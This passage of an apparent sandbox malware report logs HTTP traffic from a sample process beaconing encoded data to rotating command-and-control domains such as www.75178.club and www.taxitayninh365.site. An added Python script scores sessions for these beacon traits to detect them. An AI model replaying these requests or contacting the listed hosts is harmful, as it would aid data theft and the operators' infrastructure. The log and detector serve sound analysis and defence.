                                                              Dec 9, 2024 09:11:50.644700050 CET  472                OUT        GET /l9wb/?X25tIdT0=dKoVDaTSZmwFjIfnPMekOmNSbaoqabF1rLRKWxbZMRgsIAaeZOJ62iUdSY3DsOWKNrgOWvNnZKtmZJtN7rtvj9a+jKl6nL3gw5l63A2ReISiUGJmdOx1Ym0=&_PMl3=z6VH1Hp8JH HTTP/1.1
                                                              Host: www.44ynh.top
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                              Accept-Language: en-us
                                                              Connection: close
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:31.0) Gecko/20100101 Firefox/31.0 K-Meleon/75.0
                                                              Dec 9, 2024 09:11:52.245742083 CET  302                IN         HTTP/1.1 404 Not Found
                                                              Server: nginx
                                                              Date: Mon, 09 Dec 2024 08:11:51 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 138
                                                              Connection: close
                                                              ETag: "66df0ead-8a"
                                                              Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
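Sessions 5 to 12 show the same beacon shape twice: three POSTs to a single four-character directory with Content-Length 205, 225 and 10305, then a GET carrying the same form key, every request with the same K-Meleon user agent and a Referer pointing at the POST target itself, and the key name X25tIdT0 reused when the process moves from www.jijievo.site to www.44ynh.top. As an added example, not part of the Joe Sandbox report or of any detection product, the following Python scores per-host HTTP session summaries against those traits and separately lists hosts that received the same form key from one process, which is the domain-rotation signal. The session records are constructed from the tables above; the benign www.example.com login session, its PID 4120 and its Chrome user agent are made up for contrast, and the threshold of three indicators per host is the example's own choice.

```python
import re
from collections import defaultdict

# User-Agent seen on every request of PID 5592 in this report.
UA = "Mozilla/5.0 (Windows NT 6.2; rv:31.0) Gecko/20100101 Firefox/31.0 K-Meleon/75.0"
# A single short directory such as /521z/ or /l9wb/, as used by every session above.
PATH_RE = re.compile(r"^/[a-z0-9]{4}/$")


def session(method, host, path, length, first_key, referer=None, ua=UA, pid=5592):
    """One HTTP session reduced to the fields the report's session tables expose."""
    return {"pid": pid, "method": method, "host": host, "path": path,
            "length": length, "first_key": first_key, "referer": referer, "ua": ua}


# Constructed from sessions 5 to 12 (first form key of body or query, POST
# Content-Length) plus one made-up benign login POST for contrast.
SESSIONS = [
    session("POST", "www.jijievo.site", "/521z/", 205, "X25tIdT0", "http://www.jijievo.site/521z/"),
    session("POST", "www.jijievo.site", "/521z/", 225, "X25tIdT0", "http://www.jijievo.site/521z/"),
    session("POST", "www.jijievo.site", "/521z/", 10305, "X25tIdT0", "http://www.jijievo.site/521z/"),
    session("GET", "www.jijievo.site", "/521z/", 0, "X25tIdT0"),
    session("POST", "www.44ynh.top", "/l9wb/", 205, "X25tIdT0", "http://www.44ynh.top/l9wb/"),
    session("POST", "www.44ynh.top", "/l9wb/", 225, "X25tIdT0", "http://www.44ynh.top/l9wb/"),
    session("POST", "www.44ynh.top", "/l9wb/", 10305, "X25tIdT0", "http://www.44ynh.top/l9wb/"),
    session("GET", "www.44ynh.top", "/l9wb/", 0, "X25tIdT0"),
    session("POST", "www.example.com", "/account/login", 87, "username",
            "https://www.example.com/account/login",
            ua="Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/120.0", pid=4120),
]


def host_indicators(sessions):
    """Score each (pid, host) pair; return the hosts with at least three indicators."""
    by_host = defaultdict(list)
    for s in sessions:
        by_host[(s["pid"], s["host"])].append(s)
    hits = {}
    for (pid, host), reqs in by_host.items():
        posts = [r for r in reqs if r["method"] == "POST"]
        gets = [r for r in reqs if r["method"] == "GET"]
        found = []
        if all("K-Meleon/75.0" in r["ua"] for r in reqs):
            found.append("fixed K-Meleon user agent on every request")
        paths = {r["path"] for r in reqs}
        if len(paths) == 1 and PATH_RE.match(next(iter(paths))):
            found.append("all traffic to one four-character directory")
        if posts and all(r["referer"] == f"http://{host}{r['path']}" for r in posts):
            found.append("Referer points at the POST target itself")
        lengths = sorted(r["length"] for r in posts)
        if len(lengths) >= 3 and lengths[0] < lengths[1] < 1000 < lengths[-1]:
            found.append("two small POSTs then one large POST (205/225/10305 here)")
        if posts and gets and len({r["first_key"] for r in reqs}) == 1:
            found.append("same form key in POST bodies and GET query")
        if len(found) >= 3:
            hits[host] = found
    return hits


def rotated_hosts(sessions):
    """Hosts that received the same first form key from one PID: domain rotation."""
    hosts = defaultdict(set)
    for s in sessions:
        hosts[(s["pid"], s["first_key"])].add(s["host"])
    return {key: sorted(h) for (pid, key), h in hosts.items() if len(h) > 1}


if __name__ == "__main__":
    for host, why in host_indicators(SESSIONS).items():
        print(host, "->", "; ".join(why))
    print("rotation:", rotated_hosts(SESSIONS))
```

Both C2 hosts score all five indicators and the constructed login session scores none. The per-host checks are deliberately independent of the domain names, which change per campaign; the key-sharing check is what ties the rotation together when the report's later sessions against www.75178.club are added to the input.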


                                                              Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                              13          192.168.2.4  49958        23.167.152.41   80                5592  C:\Program Files (x86)\BeHZpnDPNybFdUBFlhMsZivWZNAnjuKahagnAqinfMgldqWRDXiP\oFlOzErifOVgUf.exe
                                                              Timestamp                           Bytes transferred  Direction  Data
                                                              Dec 9, 2024 09:12:07.494719982 CET  732                OUT        POST /q34f/ HTTP/1.1
                                                              Host: www.75178.club
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                              Accept-Language: en-us
                                                              Accept-Encoding: gzip, deflate, br
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Connection: close
                                                              Cache-Control: no-cache
                                                              Content-Length: 205
                                                              Origin: http://www.75178.club
                                                              Referer: http://www.75178.club/q34f/
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:31.0) Gecko/20100101 Firefox/31.0 K-Meleon/75.0
                                                              Data Raw: 58 32 35 74 49 64 54 30 3d 51 57 45 56 77 47 79 2f 6c 79 59 78 71 55 75 59 6d 50 51 52 54 6a 57 62 62 45 73 59 2f 56 61 55 6d 62 72 71 78 32 49 43 47 67 30 47 56 49 4e 45 50 75 32 4e 64 5a 66 46 7a 4d 77 6f 68 46 32 6d 6a 65 2b 79 4b 4a 72 78 33 68 68 45 70 50 6a 36 5a 4b 67 39 70 55 34 6f 54 6f 64 44 30 6c 47 63 4a 73 4a 32 36 65 59 41 44 39 4e 74 58 31 6f 6e 47 48 32 62 41 2f 38 59 5a 55 6e 45 49 59 47 74 73 45 48 47 41 45 6c 47 6b 64 69 74 76 66 4b 30 52 46 42 56 64 30 70 4b 45 55 48 7a 31 34 50 76 61 5a 70 76 38 52 6c 63 6e 48 64 46 6b 35 4f 58 7a 5a 36 72 4e 55 36 70 76 30 46 6d 34 50 6b 66 6d 77 3d 3d
                                                              Data Ascii: X25tIdT0=QWEVwGy/lyYxqUuYmPQRTjWbbEsY/VaUmbrqx2ICGg0GVINEPu2NdZfFzMwohF2mje+yKJrx3hhEpPj6ZKg9pU4oTodD0lGcJsJ26eYAD9NtX1onGH2bA/8YZUnEIYGtsEHGAElGkditvfK0RFBVd0pKEUHz14PvaZpv8RlcnHdFk5OXzZ6rNU6pv0Fm4Pkfmw==


                                                              Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                              14          192.168.2.4  49967        23.167.152.41   80                5592  C:\Program Files (x86)\BeHZpnDPNybFdUBFlhMsZivWZNAnjuKahagnAqinfMgldqWRDXiP\oFlOzErifOVgUf.exe
                                                              Timestamp                           Bytes transferred  Direction  Data
                                                              Dec 9, 2024 09:12:10.155463934 CET  752                OUT        POST /q34f/ HTTP/1.1
                                                              Host: www.75178.club
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                              Accept-Language: en-us
                                                              Accept-Encoding: gzip, deflate, br
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Connection: close
                                                              Cache-Control: no-cache
                                                              Content-Length: 225
                                                              Origin: http://www.75178.club
                                                              Referer: http://www.75178.club/q34f/
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:31.0) Gecko/20100101 Firefox/31.0 K-Meleon/75.0
                                                              Data Raw: 58 32 35 74 49 64 54 30 3d 51 57 45 56 77 47 79 2f 6c 79 59 78 72 33 6d 59 67 73 34 52 61 6a 57 59 48 55 73 59 71 6c 61 51 6d 62 6e 71 78 33 64 66 42 55 59 47 56 73 4a 45 49 73 65 4e 51 35 66 46 34 73 77 68 38 56 32 54 6a 65 79 4d 4b 49 58 78 33 68 31 45 70 4f 54 36 5a 37 67 38 6f 45 34 71 47 34 64 42 72 31 47 63 4a 73 4a 32 36 59 31 6c 44 39 46 74 57 46 34 6e 4a 46 4f 45 4d 66 38 58 59 55 6e 45 44 34 47 70 73 45 48 42 41 46 4a 34 6b 66 61 74 76 66 61 30 52 52 56 61 58 30 6f 50 4f 30 47 54 32 4b 36 4c 57 37 6f 63 32 41 78 7a 75 45 6c 79 6c 2f 44 4e 69 6f 62 38 66 55 65 61 79 7a 4d 53 31 4d 5a 57 39 30 69 67 53 68 6b 79 64 49 2f 47 49 50 69 58 71 4e 42 4e 37 53 6f 3d
                                                              Data Ascii: X25tIdT0=QWEVwGy/lyYxr3mYgs4RajWYHUsYqlaQmbnqx3dfBUYGVsJEIseNQ5fF4swh8V2TjeyMKIXx3h1EpOT6Z7g8oE4qG4dBr1GcJsJ26Y1lD9FtWF4nJFOEMf8XYUnED4GpsEHBAFJ4kfatvfa0RRVaX0oPO0GT2K6LW7oc2AxzuElyl/DNiob8fUeayzMS1MZW90igShkydI/GIPiXqNBN7So=


                                                              Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                              15          192.168.2.4  49973        23.167.152.41   80                5592  C:\Program Files (x86)\BeHZpnDPNybFdUBFlhMsZivWZNAnjuKahagnAqinfMgldqWRDXiP\oFlOzErifOVgUf.exe
                                                              Timestamp                           Bytes transferred  Direction  Data
                                                              Dec 9, 2024 09:12:12.826097965 CET  10834              OUT        POST /q34f/ HTTP/1.1
                                                              Host: www.75178.club
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                              Accept-Language: en-us
                                                              Accept-Encoding: gzip, deflate, br
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Connection: close
                                                              Cache-Control: no-cache
                                                              Content-Length: 10305
                                                              Origin: http://www.75178.club
                                                              Referer: http://www.75178.club/q34f/
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:31.0) Gecko/20100101 Firefox/31.0 K-Meleon/75.0
                                                              Data Ascii: X25tIdT0= [TRUNCATED]


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                              16 | 192.168.2.4 | 49979 | 23.167.152.41 | 80
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Dec 9, 2024 09:12:15.487700939 CET | 473 | OUT | GET /q34f/?X25tIdT0=dUs1zx3MtgRbplDX2ZUJYQ2PdhhIhHuhj9/PkAdaJlwoIMpaDvWmQ8f5x9wKpmWIn5GTBIDw1kY0kdraeZ9e5WN4Bfp+jFvkFPdElOhqE98bTiQ+FUKDG58=&_PMl3=z6VH1Hp8JH HTTP/1.1
                                                              Host: www.75178.club
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                              Accept-Language: en-us
                                                              Connection: close
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:31.0) Gecko/20100101 Firefox/31.0 K-Meleon/75.0


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              17 | 192.168.2.4 | 49997 | 103.75.185.22 | 80 | 5592 | C:\Program Files (x86)\BeHZpnDPNybFdUBFlhMsZivWZNAnjuKahagnAqinfMgldqWRDXiP\oFlOzErifOVgUf.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Dec 9, 2024 09:12:22.587277889 CET | 759 | OUT | POST /syud/ HTTP/1.1
                                                              Host: www.taxitayninh365.site
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                              Accept-Language: en-us
                                                              Accept-Encoding: gzip, deflate, br
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Connection: close
                                                              Cache-Control: no-cache
                                                              Content-Length: 205
                                                              Origin: http://www.taxitayninh365.site
                                                              Referer: http://www.taxitayninh365.site/syud/
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:31.0) Gecko/20100101 Firefox/31.0 K-Meleon/75.0
                                                              Data Ascii: X25tIdT0=tyMI7ugAvLpMHNQ6YxO0nFg6j8y+cios5aqTO/lZFWCR4xj0Uw5QsMJMvE45pD1XYyzy0dZsRCOvZWjaOkF2JXfqvAG2HwKukiRGPVkJYZAXfQRJfFp18KEzDHnFRBTcZBHkeV2+q9pyQkEG75gRxar8dyn9zwaJVElRf+TibzhzZc+HsSchqRwnvNDAAlyK1A==
                                                              Dec 9, 2024 09:12:24.143306017 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                              Connection: close
                                                              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                              pragma: no-cache
                                                              content-type: text/html
                                                              content-length: 1238
                                                              date: Mon, 09 Dec 2024 08:12:23 GMT
                                                              server: LiteSpeed
                                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by <a style="color:#fff;"
                                                              Dec 9, 2024 09:12:24.143388033 CET | 240 | IN
                                                              Data Ascii: href="http://www.litespeedtech.com/error-page">LiteSpeed Web Server</a><p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              18 | 192.168.2.4 | 50006 | 103.75.185.22 | 80 | 5592 | C:\Program Files (x86)\BeHZpnDPNybFdUBFlhMsZivWZNAnjuKahagnAqinfMgldqWRDXiP\oFlOzErifOVgUf.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Dec 9, 2024 09:12:25.243978977 CET | 779 | OUT | POST /syud/ HTTP/1.1
                                                              Host: www.taxitayninh365.site
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                              Accept-Language: en-us
                                                              Accept-Encoding: gzip, deflate, br
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Connection: close
                                                              Cache-Control: no-cache
                                                              Content-Length: 225
                                                              Origin: http://www.taxitayninh365.site
                                                              Referer: http://www.taxitayninh365.site/syud/
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:31.0) Gecko/20100101 Firefox/31.0 K-Meleon/75.0
                                                              Data Ascii: X25tIdT0=tyMI7ugAvLpMdsg6eSW0hlg99My+VCo35auTO79JGkWR7QT0Tx5QrMJM3U48nj0ZYyuY0c1sRGmvZUraO3t3Knfs6QGOagKukiRGPWYjYdsXfCFJQEp20qEwKnnFVBTYZBHSeQWYq/hyQhgG7sAe4ar2QSmP+Vnsb00+WO/xEHljV6zd9j924RUUyKK0NmPDuGNe76/qZuc53zbR2M+xF6E=
                                                              Dec 9, 2024 09:12:26.804797888 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                              Connection: close
                                                              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                              pragma: no-cache
                                                              content-type: text/html
                                                              content-length: 1238
                                                              date: Mon, 09 Dec 2024 08:12:26 GMT
                                                              server: LiteSpeed
                                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by <a style="color:#fff;"
                                                              Dec 9, 2024 09:12:26.804867983 CET | 240 | IN
                                                              Data Ascii: href="http://www.litespeedtech.com/error-page">LiteSpeed Web Server</a><p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              19 | 192.168.2.4 | 50012 | 103.75.185.22 | 80 | 5592 | C:\Program Files (x86)\BeHZpnDPNybFdUBFlhMsZivWZNAnjuKahagnAqinfMgldqWRDXiP\oFlOzErifOVgUf.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Dec 9, 2024 09:12:27.900866032 CET | 10861 | OUT | POST /syud/ HTTP/1.1
                                                              Host: www.taxitayninh365.site
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                              Accept-Language: en-us
                                                              Accept-Encoding: gzip, deflate, br
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Connection: close
                                                              Cache-Control: no-cache
                                                              Content-Length: 10305
                                                              Origin: http://www.taxitayninh365.site
                                                              Referer: http://www.taxitayninh365.site/syud/
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:31.0) Gecko/20100101 Firefox/31.0 K-Meleon/75.0
                                                              Data Ascii: X25tIdT0= [TRUNCATED]


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              20 | 192.168.2.4 | 50018 | 103.75.185.22 | 80 | 5592 | C:\Program Files (x86)\BeHZpnDPNybFdUBFlhMsZivWZNAnjuKahagnAqinfMgldqWRDXiP\oFlOzErifOVgUf.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Dec 9, 2024 09:12:30.549448967 CET | 482 | OUT | GET /syud/?X25tIdT0=gwko4eFZldhJcfMqOkuan3QkmOfQdTdfj6+zOL8mAR+JwCfgYxN4oPNpnnwcuB8vQ1y33dVzUTzhe1i/ZlYVLB7aoFOkRW7okE41Q20TXo8AOTZtTl9M9bg=&_PMl3=z6VH1Hp8JH HTTP/1.1
                                                              Host: www.taxitayninh365.site
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                              Accept-Language: en-us
                                                              Connection: close
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:31.0) Gecko/20100101 Firefox/31.0 K-Meleon/75.0
                                                              Dec 9, 2024 09:12:32.109389067 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                              Connection: close
                                                              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                              pragma: no-cache
                                                              content-type: text/html
                                                              content-length: 1238
                                                              date: Mon, 09 Dec 2024 08:12:31 GMT
                                                              server: LiteSpeed
                                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by <a style="color:#fff;"
                                                              Dec 9, 2024 09:12:32.109437943 CET | 240 | IN
                                                              Data Ascii: href="http://www.litespeedtech.com/error-page">LiteSpeed Web Server</a><p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              21 | 192.168.2.4 | 50024 | 162.0.213.94 | 80 | 5592 | C:\Program Files (x86)\BeHZpnDPNybFdUBFlhMsZivWZNAnjuKahagnAqinfMgldqWRDXiP\oFlOzErifOVgUf.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Dec 9, 2024 09:12:37.657143116 CET | 741 | OUT | POST /wr6c/ HTTP/1.1
                                                              Host: www.ontherise.top
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                              Accept-Language: en-us
                                                              Accept-Encoding: gzip, deflate, br
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Connection: close
                                                              Cache-Control: no-cache
                                                              Content-Length: 205
                                                              Origin: http://www.ontherise.top
                                                              Referer: http://www.ontherise.top/wr6c/
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:31.0) Gecko/20100101 Firefox/31.0 K-Meleon/75.0
                                                              Data Ascii: X25tIdT0=C0xkLyGCgnKq4bAGlzAIr6c/v/GfxIx1tjIZLhcDrZ0FWI6yZnKwCGOrlPCByk1e1rT5REAIuWgeTGvXcs7ZpaMRwUeo1fYGNFRfDBShUYSOu/5eZnpuIDipoG3VHzJTFP7edish1eQx+xkWGaCVQ/jSlGabay4lsiCHzFAyI4VGe+Lib/9vYgpUhiYgLcFIRw==
                                                              Dec 9, 2024 09:12:38.888055086 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                              Date: Mon, 09 Dec 2024 08:12:38 GMT
                                                              Server: Apache
                                                              Content-Length: 16052
                                                              Connection: close
                                                              Content-Type: text/html
                                                              Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]
                                                              Dec 9, 2024 09:12:38.888160944 CET | 224 | IN
                                                              Data Ascii: > </defs> <g transform="translate(170.14515,0.038164)" id="layer1"> <g id="g6219" > <path transform="matrix(1.0150687,0,0,11.193923,-1.3895945,-2685.7441)"
                                                              Dec 9, 2024 09:12:38.888174057 CET | 1236 | IN
                                                              Data Ascii: style="display:inline;fill:#000000;fill-opacity:1;stroke:#000000;stroke-width:0.1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" d="m 145.0586,263.51309 c -90.20375,-0.0994 -119.20375,-0.0994 -119.20375,-0.09
                                                              Dec 9, 2024 09:12:38.888446093 CET | 1236 | IN
                                                              Data Ascii: ;stroke-opacity:1;" /> <path id="path4496" d="m 85.115421,100.5729 c -0.0036,3.37532 -0.0071,6.75165 -0.0107,10.12897 m 0.512159,0.18258 c -1.914603,-0.23621 -3.505591,1.17801 -4.861444,2.68113 -1.355853,1.5
                                                              Dec 9, 2024 09:12:38.888458967 CET | 1236 | IN
                                                              Data Ascii: ;" /> <path id="path4513" d="m 74.6875,125.03748 c -8.394789,7.68654 -16.790624,15.37405 -23.988969,22.38484 -7.198345,7.0108 -13.197555,13.3433 -18.781379,20.01048 -5.583823,6.66719 -10.749655,13.66605 -13.
                                                              Dec 9, 2024 09:12:38.888469934 CET1236INData Raw: 23 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 70 78 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3a 62 75 74 74 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 6a 6f 69 6e 3a 6d 69 74 65 72 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a
                                                              Data Ascii: #000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4521" d="m 96.8125,126.22498 c 6.89586,6.45836 13.7917,12.9167 19.98957,19.14581 6.19786,6.22912 11.6978
                                                              Dec 9, 2024 09:12:38.889301062 CET1236INData Raw: 33 33 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 6d 20 38 39 2c 31 32 33 2e 36 36 32 34 38 20 63 20 36 2e 31 35 39 38 38 35 2c 31 31 2e 35 31 37 37 31 20 31 32 2e 33 31 39 39 36 2c 32 33 2e 30 33 35 37 37 20 31 36 2e 38 33 37 32 34 2c
                                                              Data Ascii: 33" d="m 89,123.66248 c 6.159885,11.51771 12.31996,23.03577 16.83724,31.78904 4.51728,8.75327 7.29964,14.54985 9.24424,18.32123 1.9446,3.77138 3.00519,5.42118 4.1838,9.19262 1.17861,3.77144 2.47477,9.6631 1.94443,23.80647 -0.53034
                                                              Dec 9, 2024 09:12:38.889312983 CET552INData Raw: 37 2e 34 33 37 39 36 20 2d 30 2e 30 35 38 39 31 2c 34 35 2e 33 35 32 31 20 30 2e 30 35 38 39 32 2c 31 37 2e 39 31 34 31 33 20 30 2e 32 39 34 36 31 2c 33 39 2e 33 36 31 35 33 20 30 2e 37 30 37 30 39 31 2c 35 38 2e 38 30 37 33 38 20 30 2e 34 31 32
                                                              Data Ascii: 7.43796 -0.05891,45.3521 0.05892,17.91413 0.29461,39.36153 0.707091,58.80738 0.412482,19.44585 1.001711,36.88701 1.590999,54.32995" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoi
                                                              Dec 9, 2024 09:12:38.889322042 CET1236INData Raw: 30 30 37 39 20 35 2e 31 65 2d 35 2c 31 37 2e 35 36 33 33 39 20 30 2e 34 31 32 36 31 37 2c 31 32 2e 35 35 35 34 38 20 31 2e 33 35 35 30 36 34 2c 33 34 2e 39 33 38 35 39 20 32 2e 34 37 34 39 39 36 2c 35 34 2e 37 34 32 33 39 20 31 2e 31 31 39 39 33
                                                              Data Ascii: 0079 5.1e-5,17.56339 0.412617,12.55548 1.355064,34.93859 2.474996,54.74239 1.119932,19.80379 2.415574,37.00049 3.712005,54.20767" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:
                                                              Dec 9, 2024 09:12:38.889333010 CET224INData Raw: 32 35 31 20 36 2e 31 32 38 38 35 2c 2d 31 2e 32 33 37 37 34 20 39 2e 31 39 31 38 2c 2d 32 2e 30 36 32 33 38 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 6e 6f 6e 65
                                                              Data Ascii: 251 6.12885,-1.23774 9.1918,-2.06238" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4560"
